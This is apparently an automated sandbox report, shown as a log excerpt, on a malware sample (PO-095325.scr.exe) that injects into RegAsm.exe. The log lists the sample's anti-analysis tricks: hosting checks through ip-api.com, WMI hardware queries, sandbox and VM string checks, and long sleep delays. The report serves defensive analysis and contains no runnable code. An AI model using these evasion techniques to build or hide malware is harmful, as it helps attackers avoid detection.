                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: PO-095325.scr.exe PID: 4424, type: MEMORYSTR
                    Check if machine is in data center or colocation facility
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: PO-095325.scr.exe, 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4463449563.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeMemory allocated: C90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeMemory allocated: 28F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeMemory allocated: F10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 15A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 32B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2FF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599655Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599325Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599198Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598216Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598108Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597559Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597344Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597234Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597125Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597015Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596905Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596797Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596687Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596578Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596468Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596359Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596250Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596140Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596031Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595921Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595812Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595703Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595593Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595469Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595359Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595250Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595140Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595031Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594921Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594783Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594547Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6170Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3380Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 2188Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 7666Jump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exe TID: 1684Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6508Thread sleep count: 6170 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6508Thread sleep count: 3380 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4984Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep count: 34 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2956Thread sleep count: 2188 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2956Thread sleep count: 7666 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -599765s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -599655s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -599547s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -599437s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -599325s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -599198s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -599094s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -598984s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -598875s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -598765s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -598656s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -598547s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -598437s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -598328s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -598216s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -598108s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -598000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -597890s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -597781s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -597672s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -597559s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -597453s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -597344s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -597234s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -597125s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -597015s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -596905s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -596797s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -596687s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -596578s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -596468s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -596359s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -596250s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -596140s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -596031s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -595921s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -595812s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -595703s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -595593s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -595469s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -595359s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -595250s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -595140s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -595031s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -594921s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -594783s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -594656s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3576Thread sleep time: -594547s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 3452Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 3452Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599655Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599325Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599198Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 599094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598216Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598108Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 598000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597559Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597344Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597234Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597125Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 597015Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596905Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596797Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596687Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596578Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596468Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596359Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596250Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596140Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 596031Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595921Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595812Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595703Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595593Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595469Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595359Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595250Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595140Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 595031Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594921Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594783Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 594547Jump to behavior
                    Source: powershell.exe, 00000002.00000002.2047492767.0000000004896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                    Source: RegAsm.exe, 00000004.00000002.4463449563.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: powershell.exe, 00000002.00000002.2047492767.0000000004896000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                    Source: svchost.exe, 00000005.00000002.3637630206.000002143CE2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                    Source: svchost.exe, 00000005.00000002.3638166008.0000021442459000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: RegAsm.exe, 00000004.00000002.4463449563.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBox
